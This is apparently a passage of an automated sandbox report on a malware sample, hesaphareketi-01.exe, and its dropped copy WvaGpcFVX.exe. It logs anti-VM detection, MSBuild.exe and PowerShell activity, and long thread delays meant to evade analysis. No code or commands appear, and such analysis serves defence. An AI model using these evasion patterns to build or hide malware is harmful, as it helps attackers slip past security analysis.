Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: hesaphareketi-01.exe PID: 5392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WvaGpcFVX.exe PID: 7304, type: MEMORYSTR

Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Memory allocated: EA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Memory allocated: 2980000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Memory allocated: EA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Memory allocated: 7950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Memory allocated: 8950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Memory allocated: 8B00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Memory allocated: 9B00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Memory allocated: A090000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Memory allocated: B090000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Memory allocated: C090000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2B10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2C90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 4C90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Memory allocated: 2BC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Memory allocated: 2D70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Memory allocated: 4D70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Memory allocated: 7A70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Memory allocated: 8A70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Memory allocated: 8C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Memory allocated: 9C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Memory allocated: A1B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Memory allocated: B1B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 11C0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2DF0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2C40000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599321	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598650	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598421	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597655	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597201	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597090	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596852	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596692	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596524	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596072	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595836	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594952	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594296	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593858	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598469
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598295
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598187
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597555
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595764
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595436
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593889

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5182	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5315	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 6453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 3377	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 2057
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 7799

Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 3768	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5916	Thread sleep count: 5182 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7236	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1136	Thread sleep count: 220 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7180	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7232	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7172	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -28592453314249787s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7508	Thread sleep count: 6453 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7508	Thread sleep count: 3377 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -599655s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -599546s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -599321s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -599203s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -599093s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -598984s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -598874s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -598765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -598650s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -598531s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -598421s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -598312s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -598203s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -598093s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -597984s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -597875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -597765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -597655s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -597546s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -597437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -597328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -597201s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -597090s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -596968s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -596852s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -596692s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -596524s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -596203s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -596072s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -595953s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -595836s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -595718s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -595609s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -595500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -595390s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -595281s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -595171s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -595062s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -594952s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -594843s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -594734s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -594625s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -594515s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -594406s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -594296s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -594187s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -594078s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -593968s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep time: -593858s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe TID: 7392	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7812	Thread sleep count: 2057 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -599890s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -599781s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7812	Thread sleep count: 7799 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -599672s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -599562s >= -30000s
